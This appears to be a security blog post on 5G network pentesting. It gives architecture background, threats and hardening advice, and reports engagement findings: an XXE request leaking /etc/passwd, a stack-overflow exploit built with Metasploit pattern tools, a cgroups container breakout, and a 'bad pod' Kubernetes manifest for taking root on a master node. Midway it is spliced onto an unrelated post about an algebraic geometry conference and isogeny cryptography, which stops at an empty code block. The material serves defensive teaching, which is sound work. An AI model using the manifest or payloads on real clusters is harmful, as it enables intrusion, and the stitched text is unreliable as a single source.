Typical perceived threats, and their severity if compromised, are illustrated below. The high-risk vector is via the corporate and vendor estate, medium-risk vectors are via the external internet and rogue operators, and the low-risk vector is via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker were to gain access to the corporate network and suitable credentials for the cloud network equipment running the 5G network, a DoS attack conducted from there would have a high-level impact. This is opposed to an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposed risks would be limited to the cell site in question.

“Attack scenarios against a typical 4G/5G mobile network”

So, a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core. A 5G Standalone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date. It provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are that an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core, that the NSA network uses 4G infrastructure which operators are already familiar with, and that deployment of a 5G network can be quicker by using the existing infrastructure.

A 5G SA network helps reduce latency, improves network performance and centralises control of network management functions. 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separately from each other on the same physical infrastructure. While services like smart meters require security, low power and high reliability but are more forgiving with respect to latency, others like driverless cars may need ultra-low latency (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. However, the main disadvantage of implementing a 5G SA network is the cost of implementation and of training staff to learn and correctly configure all parts of the new 5G SA core infrastructure.

An OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor-neutral hardware or software. The interfaces linking the components (e.g. RU/DU/CU) use open interface specifications, with different architecture options. A Radio Unit (RU) handles the radio link and antenna connectivity, while a Distributed Unit (DU) handles the baseband protocols and interconnections to the Centralised Unit (CU). The architecture options include a RAN with just Radio Units (RU) and Baseband Units (BBU), or one split between RU, DU and CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is typically virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as Docker containers on primarily Dell hardware, with a software-defined network layer linking into the 5G core.

In 5G a user identity (i.e. the IMSI) is never sent over the air in the clear. On the RAN/edge datacentre the control and user planes are encrypted over the air and on the wire (i.e. IPsec), with the 5G core utilising encrypted and authenticated signalling traffic. The 5G network components expose HTTP/2 Service Based Interface (SBI) APIs, both externally and internally, which provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.

So what are the main security threats?

Shown below is a high-level overview of a 5G network with a summary of threats. A radio unit front end handles the interconnect to the user equipment (UE); an RU, DU and CU together form the gNodeB (i.e. the basestation). The Distributed Unit (DU) handles the baseband layer, connecting to the RU over the fronthaul and to the Centralised Unit (CU) over the midhaul. The DU does not have any access to customer communications, as it may be deployed in unsupervised sites. The CU and Non-3GPP Inter Working Function (N3IWF), which terminate the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low-latency applications, Multi-Access Edge Computing (MEC) servers are now being developed to reduce network congestion and application latency by pushing computing resources, including storage, to the edge of the network, collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network, providing processing capacity for high-demand streaming applications like virtual reality games as well as low-latency processing for driverless cars. All components are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure, either to cause damage (e.g. arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC via a poorly configured CI/CD pipeline and the ingest of malicious code is a further threat.

The N1/N2 link carrying the NAS protocol provides mobility management and session management between the User Equipment (UE) and the Access and Mobility Management Function (AMF); over the air, NAS is carried within the RRC protocol to/from the UE. A User Plane Function (UPF) acts as the router for user data connections. The core network contains the AMF, the gateway into the core, which talks to the AUSF/UDM to authenticate the handset with the network, while the network also authenticates itself to the handset using public key cryptography. In the core network all components, including many legacy 4G components, are now virtualised, running as Kubernetes pods, with worker nodes running on either a custom cloud environment or an open-source instance such as OpenStack. Targeting the 5G NFVI or mobile core cloud via corporate access is a likely attack vector, either disrupting the service by a DoS attack or acquiring billing data. The same signalling attacks seen in 4G are now prevalent in 5G, because the same 4G components and associated protocols (i.e. SS7, DIAMETER, GTP) are collocated with 5G components, with the legacy 4G network providing service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (i.e. AMF, UPF, etc.); however, due to absent or poor encryption it is still possible to either view this traffic or query the APIs directly. The diagram below illustrates the various threats against a typical 5G deployment. A fuller hierarchy of threats is detailed within the MITRE FiGHT attack framework.

“Threats against a typical 5G network”

Reducing the vulnerabilities will decrease the risks and threats an operator will face. However, there is a fine line between testing time and finding vulnerabilities, and we can never guarantee we have found all the issues with a component. When scoping pentesting assessments, we always start with the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought into consult on 5G network builds.

Segment, restrict and deny all

Simple idea – if an attacker cannot see the service or endpoint then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading. For example, segmentation ensures malware in one section does not affect systems in another. Segmentation reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to directly connect to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management to a small set of IP ranges using robust firewall rules with an implicit “deny all” statement is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but if not properly segmented from the corporate network can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role based access controls and multi-factor access controls to these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place, with access closely monitored. Do not implement a secure 5G core but then allow all 3rd party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B’s management system? The answer is a clear no.
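As a concrete illustration of that "deny all" posture, a minimal nftables sketch for a management segment might look as follows (the table name, address range and ports are invented for illustration, not taken from any real deployment):

```
# Minimal default-deny nftables policy for a 5G management segment.
# All names, addresses and ports below are illustrative.
table inet mgmt_filter {
    chain input {
        type filter hook input priority 0; policy drop;   # implicit "deny all"
        ct state established,related accept
        iif "lo" accept
        # Only the PAW/jump-host range may reach SSH and the OSS/BSS web UI
        ip saddr 10.20.30.0/28 tcp dport { 22, 443 } accept
    }
}
```

Anything not explicitly accepted, including lateral traffic from the wider corporate network, falls through to the drop policy.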

Limit access to the underlying network switches and routers, and be sure to review both the configuration of the devices and their firmware versions. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, and even end-of-support switch and router firmware. If an attacker were able to leverage access to the underlying network components, any virtualised cloud network could simply be cut off from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller is a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software: perhaps it is a Java application with known vulnerabilities, or there is an unauthenticated northbound REST API exposed to everyone in the enterprise network, or the SDN controller OS has not been hardened – no account lockout policy and default/weak SSH credentials in use.

In short, follow zero-trust principles when designing 5G network infrastructure.

Secure the exposed management edge

An attacker will likely gain access to the corporate network first before pivoting laterally into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core, whether at the NFVI application layer (such as the hardware running the cloud instance), the exposed OSS/BSS web applications, or any interconnects (i.e. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Control (RBAC) and monitor access. Use a centralised access management platform (e.g. CyberArk) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware management layer to users (i.e. Dell iDRAC/HP iLO), don't use default credentials, and limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users through poor segmentation could let an attacker conduct a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.

The myriad of exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity Injection (XXE) vulnerability within an exposed management API and it was possible for an authenticated low privileged attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system.

It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:

  • Read the filesystem (including listing directories), which resulted in identifying a valid user on the server running the API, along with credentials to successfully log into that machine's SSH service.
  • Trigger Server-Side Request Forgery (SSRF).

The resulting authenticated XXE request and response is illustrated below:

Request

POST /oss/conf/blah HTTP/1.1
Host: 10.1.2.3:443
Cookie: JSESSIONID=xxxxxx
[…SNIP…]
<!DOCTYPE root []<nc:rpc xmlns:……..
none test;

Response

HTTP/1.1 200
error-message xml:lang="en">/edit-someconfig/default: "noneroot:x:0:0:root:/
root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
user:x:1000:0::/home/user:/bin/bash

Using this XXE vulnerability, it was possible to read a properties file, recover LDAP credential information and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all of the encrypted password hashes stored on the host, reusing the same decryption process and poorly stored key values that had been used to encrypt them. The same password was used for the root account, allowing trivial privilege escalation to root. With root access to the running API server, which in turn was a Docker container running as a Kubernetes pod, it was possible to leverage a vulnerability in the Kubernetes configuration to compromise the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation a defence-in-depth approach is paramount on any Linux host and on any containers. More on this below.
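One defence-in-depth layer sits in the application itself: XXE needs a DTD, so an API that never legitimately accepts one can reject such documents outright. Below is a minimal, illustrative Python sketch of this pre-parse check (it is not the vendor's code, and the function name is our own):

```python
import re
import xml.etree.ElementTree as ET

def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted client, refusing any document that
    carries a DOCTYPE/DTD -- the vehicle for XXE payloads -- before it
    ever reaches the parser."""
    if re.search(rb"<!DOCTYPE", data, re.IGNORECASE):
        raise ValueError("DOCTYPE/DTD not allowed in API requests")
    return ET.fromstring(data)

# A benign request parses normally...
root = parse_untrusted_xml(b"<rpc><edit-config/></rpc>")
print(root.tag)  # -> rpc

# ...but an XXE attempt is rejected before any entity could be resolved.
evil = b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'
try:
    parse_untrusted_xml(evil)
except ValueError as exc:
    print("rejected:", exc)
```

Rejecting the DTD up front is deliberately blunt; it works regardless of whether the underlying parser claims not to resolve external entities.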

Implement exploit mitigation measures on binaries

If you expose a service externally, be sure to check it is compiled with exploit mitigation measures. Exploitation can be significantly simplified by the manner in which a service/binary has been built. If a binary has an executable stack and lacks modern exploit mitigations such as ASLR, NX, stack cookies and hardened C functions, then an attacker can use any issue they might find, such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance and an exposed sensitive encrypted and proprietary service. This service was exposed externally to the enterprise network, and a brief analysis showed that it was likely a high-risk process because:

• It was exposed on all network interfaces, making it reachable across the network
• It ran as the root user
• It was built with an executable stack, and no exploit mitigations
• It used unsafe functions such as memcpy, strcat, system, popen etc.

The service took a simple encrypted stream of data that was easily decryptable into a configuration message. Analysis of the message/data stream showed an issue with how the buffer data was stored, and it was possible to trigger memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear that one important value was not passed as an input to the function processing a certain string within the configuration message: the size of the buffer used to store the parts of the string. Many of the places where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) located at the end of the stack frame. Because of the element's length it was possible to overwrite data adjacent to the buffer, and because of the buffer's location, that data included the saved instruction pointer. When the function returned, the saved instruction pointer was used to determine where to continue execution; as the attacker could control this value, they could take control of the process's execution flow.

Knowing how to crash the process, it was possible using Metasploit to determine the offset of the instruction pointer and how much data could be written to the stack. As the stack was executable, it was straightforward to find a 'JMP ESP' gadget to pivot execution into attacker-controlled data. An initial 100-byte payload was generated with Metasploit's pattern_create.rb and used to find the offset at which the instruction pointer was overwritten, via the pattern_offset.rb script. The shellcode, also generated by Metasploit, simply created a remote listener on port 5600 and was written to the stack after the bytes that control the instruction pointer.
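The offset-finding step is simple enough to reproduce without Metasploit. The sketch below, in Python, mirrors the behaviour of pattern_create.rb and pattern_offset.rb (an illustration of the technique, not the exploit code used on the engagement):

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"

def pattern_create(length: int) -> str:
    """Cyclic pattern in the style of Metasploit's pattern_create.rb:
    triples of upper/lower/digit, so any 4-byte window is unique."""
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    return full[:length]

def pattern_offset(eip: int, length: int = 8192) -> int:
    """Given the 32-bit value found in the instruction pointer after a
    crash, return its offset into the pattern (little-endian)."""
    needle = struct.pack("<I", eip).decode()
    return pattern_create(length).find(needle)

# e.g. a crash leaving EIP = 0x41326341 ("Ac2A" read little-endian)
print(pattern_offset(0x41326341))  # -> 66
```

The returned offset tells you exactly how many bytes of padding precede the saved instruction pointer in the crafted message.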

Finding and developing suitable exploit code took around 5-10 days of work and would require an attacker with good reverse engineering skills. This service was running as root on the 5G virtualised network component and, given that component's access within the 5G network, could have been leveraged by an attacker to compromise all other components. During this review the AFL fuzzer was used to look for any other locations within the input stream that could cause a crash; a number of crashes were found, revealing multiple further issues with the binary.

“Running AFL fuzzer against the target binary”

To explore this issue further, please read our blog post Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In that particular open-source case, exposing "external" protocols and associated services, such as the UPF component hosted on a remote server rather than directly within the 5G core, could be leveraged by an attacker to compromise a server (i.e. the SMF) inside the 5G core. It is important to bear this in mind when deploying equipment out to the edge of the network. Physical access to a component is possible even within a roadside cabinet or semi-secure location such as an exchange, allowing an attacker to reach the 5G core via a less closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU, DU, CU) are potentially exposed.

Secure the virtualised cloud layer

All 5G cores run on a virtualised cloud system, whether a custom-built environment or one from a provider such as VMware. The main question is: can an attacker break out of one container or pod to compromise other containers, or potentially other clusters? It might even be possible for an attacker to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities that can be assigned to a running pod/container – privileged mode, hostPID, CAP_SYS_ADMIN, docker.sock, hostPath, hostNetwork – that may be overly permissive, allowing an attacker to leverage such a feature to mount the underlying cluster host's file system or to take full control over the Kubernetes host. We have also seen issues with kernel patching, with a kernel privilege escalation vulnerability leveraged to break out of a container.

During recent testing, security controls on the deployment of pods in the cluster were not enforced by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as the root user, and containers with host facilities could all be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads and the nodes, and potentially gain access to the wider 5G environment.

The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may be from other namespaces they do not have direct privileges for, breaking the separation of role model in use.

Leveraging a vulnerability such as the previous XXE issue or brute forcing SSH login credentials to a Docker container running with overly permissive capabilities has been leveraged on various engagements and is illustrated below.

“Container breakout via initial XXE vulnerability”

As mentioned, it was possible to recover SSH credentials via an XXE vulnerability. Utilising the SSH access and escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel did not check that the process setting the cgroups release_agent file had the correct administrative privileges (the CAP_SYS_ADMIN capability in the root namespace), so an unprivileged container that could create a new namespace with CAP_SYS_ADMIN through unshare could force the kernel to execute arbitrary commands when a process completed.


It was possible to enter a namespace with CAP_SYS_ADMIN privileges and use the notify_on_release feature of cgroups, which did not differentiate between root-namespace CAP_SYS_ADMIN and user-namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:

“Container breakout utilising cgroups”

Once a shell was obtained on the underlying Kubernetes cluster host, it was possible to SSH directly to the RAN cluster, due to credentials seen in backup files, and to attack any basestation equipment. It was also possible to leverage weak security controls on the deployment of pods in the cluster, since there was no admission controller. As the compromised cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be scheduled on; the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster, through obtaining cluster administrator privileges from a kubeconfig file located on the node filesystem.

As a proof-of-concept attack, the following deployment specification can be used to target the master node by chroot'ing to the underlying host:

“Deploying a bad pod to gain access to master node”
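A hedged sketch of such a "bad pod" manifest (the pod name, image and node name are illustrative) pins the pod to a master node, tolerates the control-plane taints, runs privileged, mounts the node's root filesystem and chroots into it:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed      # illustrative name
spec:
  nodeName: master-node-1       # pin the pod to a specific master node
  tolerations:
  - operator: Exists            # tolerate the control-plane taints
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: shell
    image: ubuntu:20.04
    securityContext:
      privileged: true
    command: ["chroot", "/host", "bash", "-c", "sleep infinity"]
    volumeMounts:
    - name: hostroot
      mountPath: /host
  volumes:
  - name: hostroot
    hostPath:
      path: /                   # mount the node's entire root filesystem
```

With no admission controller to block it, a `kubectl exec` into this pod yields a root shell on the master node's filesystem.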

With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. In some cases, due to discovered credentials, we have also been able to log directly into the vSphere client and disable hosts.

Strict enforcement of privilege limitations is essential to ensuring that users, containers and services cannot bridge the containerisation layers of container, namespace, cluster, node and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges, then a cluster admin could likely modify any admission controller policies anyway. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls; and if more roles are added to the administration model at a later date, the value of admission controllers only increases. In short, the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access to, or the ability to compromise, other layers of the orchestration model. Consider implementing limitations on which worker nodes containers can be deployed to, and on whether insecure manifest configurations can be deployed.

Scan, verify, monitor and patch all images regularly

When deploying virtualised container images it is important to check regularly for any changes to the underlying OS, audit events such as logins, and patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key: identifying and preventing risks to all the hosts, images and functions. Scanning images before they are deployed should be done by default, and repeated at a regular interval.

For instance, if a Kubernetes cluster uses a Harbor registry, simply enabling "Automatically scan images on push" with a suitable tool such as Trivy and a regularly updated vulnerability feed will suffice; it is even possible to prevent images with vulnerabilities above a certain severity from running. Implementing signed images or content trust also gives you the ability to verify both the integrity and the publisher of all the data received from a registry over any channel.

“Setting harbor to automatically scan images”

Enforce, through tighter contracts with vendors, the need to supply image patches more quickly, and verify as far as possible that patches have not changed the underlying functionality. Enforcing the use of hardened Linux OS images is best practice, utilising CIS benchmark scans to verify that OS images have been hardened; this is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Deployment (CI/CD) pipeline, with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we've compromised CI/CD pipelines for further details.

If possible, get a software bill of materials (SBOM) from vendors. An SBOM is an industry best-practice part of secure software development that enhances understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier, and stored and viewed by the network operator. Operators should periodically check it against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator together, with consideration of the software product, use case and network environment.
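The operator-side check described above can be as simple as joining the SBOM's component list against a vulnerability feed. A minimal Python sketch follows (the SBOM fragment and the vulnerability data are invented for illustration; real inputs would be CycloneDX or SPDX documents and a live feed such as the NVD):

```python
import json

# Invented CycloneDX-style SBOM fragment, for illustration only.
sbom = json.loads("""
{
  "components": [
    {"name": "openssl", "version": "1.1.1k"},
    {"name": "busybox", "version": "1.33.0"},
    {"name": "zlib",    "version": "1.2.11"}
  ]
}
""")

# Invented known-vulnerable set, keyed by (name, version).
known_vulnerable = {
    ("openssl", "1.1.1k"): ["CVE-2021-3711"],
    ("zlib", "1.2.11"): ["CVE-2018-25032"],
}

def check_sbom(sbom: dict, vuln_db: dict) -> dict:
    """Return {component@version: [CVE, ...]} for every SBOM entry
    that appears in the vulnerability feed."""
    findings = {}
    for comp in sbom.get("components", []):
        key = (comp["name"], comp["version"])
        if key in vuln_db:
            findings[f"{comp['name']}@{comp['version']}"] = vuln_db[key]
    return findings

print(check_sbom(sbom, known_vulnerable))
```

In practice the feed lookup would match version ranges rather than exact versions, but the principle of a periodic, automated SBOM-against-feed check is the same.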

Once an image is running, verifying the running services with some form of runtime defence is key. This entails implementing strong auditing, utilising auditd and syslog to monitor kernel, process and access logs. On engagements we have seen no use of such auditing, and no use of any antivirus. Securing containers with seccomp and either AppArmor or SELinux goes a long way towards preventing container escapes. Feeding all of the logging data into a suitable active defence engine could allow more predictive and threat-based active protection for running containers. Predictive protection includes capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket; threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Building a machine-learning model of each running container in the cluster is highly recommended. Applied intelligence over the monitoring log data is key for threat prevention, helping the SOC quickly identify key 5G attack vectors.
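As an example of the seccomp hardening mentioned above, a fragment of a custom container seccomp profile that returns an error for syscalls commonly used in breakout chains might look like this (a sketch only; a production profile should start from the container runtime's default allow-list rather than a deny-list like this):

```json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["unshare", "mount", "umount2", "keyctl", "ptrace"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
```

Blocking unshare alone would have frustrated the cgroups release_agent escalation described earlier, since the attacker could no longer create the namespace granting a fake CAP_SYS_ADMIN.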

Implement 5G security functions

Previous generations of cellular networks failed to provide confidentiality/integrity protection on some pre-authentication signalling messages, allowing attackers to exploit vulnerabilities such as IMSI sniffing or downgrade attacks against 5G. The 5G standard facilitates a base level of security with various security features; however, during engagements we have seen that these are not always enabled.

The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security for the enterprise. Not implementing these will compromise the confidentiality, integrity and availability (CIA).

5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:

• Subscription Permanent Identifier (SUPI) – a unique identifier for the subscriber
• Dual authentication and key agreement (AKA)
• Anchor key is used to identify and authenticate UE. The key is used to create secure access throughout the 5G infrastructure
• X509 certificates and PKI are used to protect various non-UE devices
• Encryption keys are used to demonstrate the integrity of signalling data
• Authentication when moving from 3GPP to non-3GPP networks
• Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points
• The home network carries out the original authentication based on the home profile (home control)
• Encryption keys will be based on IP network protocols and IPSec
• Security edge protection proxy (SEPP) protects the home network edge
• 5G separates control and data plane traffic

Besides increasing the length of the key algorithms (with 256-bit keys expected in future 3GPP releases), 5G mandates integrity support for the user plane, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises the standard's requirements for confidentiality and integrity protection as defined in the 3GPP specifications. 5G also protects the UE network capabilities, a field within the initial NAS message used by UEs to report to the AMF the integrity and encryption algorithms they support.

In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.

The only security features defined as mandatory within the 5G standards are integrity checking of the RRC/NAS signalling plane and, on the IPX interface, the use of a Security Edge Protection Proxy (SEPP). SUPI encryption is optional, but in the UK it is effectively required due to GDPR.

“Table illustrating various 4G / 5G security functions”

As shown, user plane integrity protection is still optional, so in theory the user plane remains vulnerable to attacks such as malicious redirection of traffic using a spoofed DNS response. Some providers now turn on the new user plane integrity protection feature by default and prevent an attacker from forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls limit attacks via the IPX network, but due to the use of HTTPS in 5G control messages a new SEPP device is mandated to allow matching of control and user plane sessions.

By collecting 5G signalling traffic it is possible to check implementations and analyse the vulnerabilities. NCC Group conducts these assessments and advises clients on implementing the various optional security features, whether related to 5G or to legacy systems, such as enabling the A5/4 algorithm on GSM networks. This issue is illustrated clearly within the paper European 5G Security in the Wild: Reality versus Expectations, which highlights the lack of concealment of permanent identifiers: it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed: after the NAS Attach Accept and RRC Connection Request messages, the m-TMSI value was not refreshed, only changing during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.

As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.

Summary

The 5G network is a complex environment, requiring methodical comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly, robustly tested and security features enabled.

As seen from above, most compromises have the following root causes or can be traced back to:

• Lack of segmentation and segregation
• Default configurations
• Overly permissive permissions and roles
• Poor patching
• Lack of security controls

SIAM AG23: Algebraic Geometry with Friends

29 August 2023 at 09:00

I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who organised the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.

As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).

In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently in cryptography, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple, but generic group structure of an elliptic curve together with efficient arithmetic from particular curve models has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of this. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.

Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has led to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.

The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather to pick our own adventure from the program.

For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:

  • Applications of Algebraic Geometry to Post-Quantum Cryptology.
  • Elliptic Curves and Pairings in Cryptography.
  • Applications of Isogenies in Cryptography.

Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.

For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference which is available on Elliptic News. As a complement to what has already been written, the aim of this blog post is to give a general impression of what people are thinking about and the research which is currently ongoing.

In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge of new protocols being put forward which use isogenies between abelian varieties, generalising away from dimension-one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm SQIsign has recently been submitted to NIST’s call for new quantum-safe signatures. Many talks through the week focused on algorithmic and parameter improvements to aid in the submission process.

What is an isogeny?

For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography is to remember how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I ended up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.

Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.

A little more specifically, for those interested, an isogeny is a special map which respects both the geometric idea of elliptic curves (it maps one projective curve to another) and the algebraic group structure which cryptographers hold so dear (mapping the sum of points is the same as the sum of the individually mapped points). Concretely, an isogeny is some (non-constant) rational map which maps the identity on one curve to the identity of another.
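For a hands-on feel, a 2-isogeny can be written down explicitly with Vélu’s formulas. The following is a toy sketch in pure Python over GF(11), with a made-up curve nowhere near cryptographic size:

```python
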